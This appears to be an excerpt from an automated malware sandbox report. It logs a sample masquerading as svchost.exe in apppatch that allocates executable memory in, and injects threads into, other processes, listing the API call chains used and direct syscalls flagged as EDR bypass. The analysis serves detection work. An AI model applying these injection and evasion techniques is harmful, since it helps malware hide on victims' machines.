Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1090000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1390000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 870000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1300000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1590000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1450000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1270000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1550000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 830000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1430000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 890000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1540000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1050000 protect: page execute and read and writeJump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02664CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02664CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01344CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_01344CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01404CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_01404CC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01534CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,8_2_01534CC0
Creates a thread in another existing process (thread injection)
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 11C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 1341360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 14B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 2D01360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 2261360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 24B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: A51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 2C71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 621360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 2701360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 28D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: 27F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe EIP: E81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1271360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A41360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 12B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1251360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BB1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1421360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1211360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 15C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1221360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 601360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1091360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 15E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1391360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 871360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: EA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1301360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 601360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1591360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1451360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D21360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: EF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DC1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F71360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1271360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1551360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1251360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: AD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 831360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 14A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1431360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 601360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 891360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1331360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1541360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1051360Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtAllocateVirtualMemory: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtAdjustPrivilegesToken: Direct from: 0x77542EAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetTimerEx: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQueueApcThread: Direct from: 0x77542EEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtEnumerateValueKey: Direct from: 0x77542BAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetInformationThread: Direct from: 0x77542ECC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtTerminateThread: Direct from: 0x77542FCC
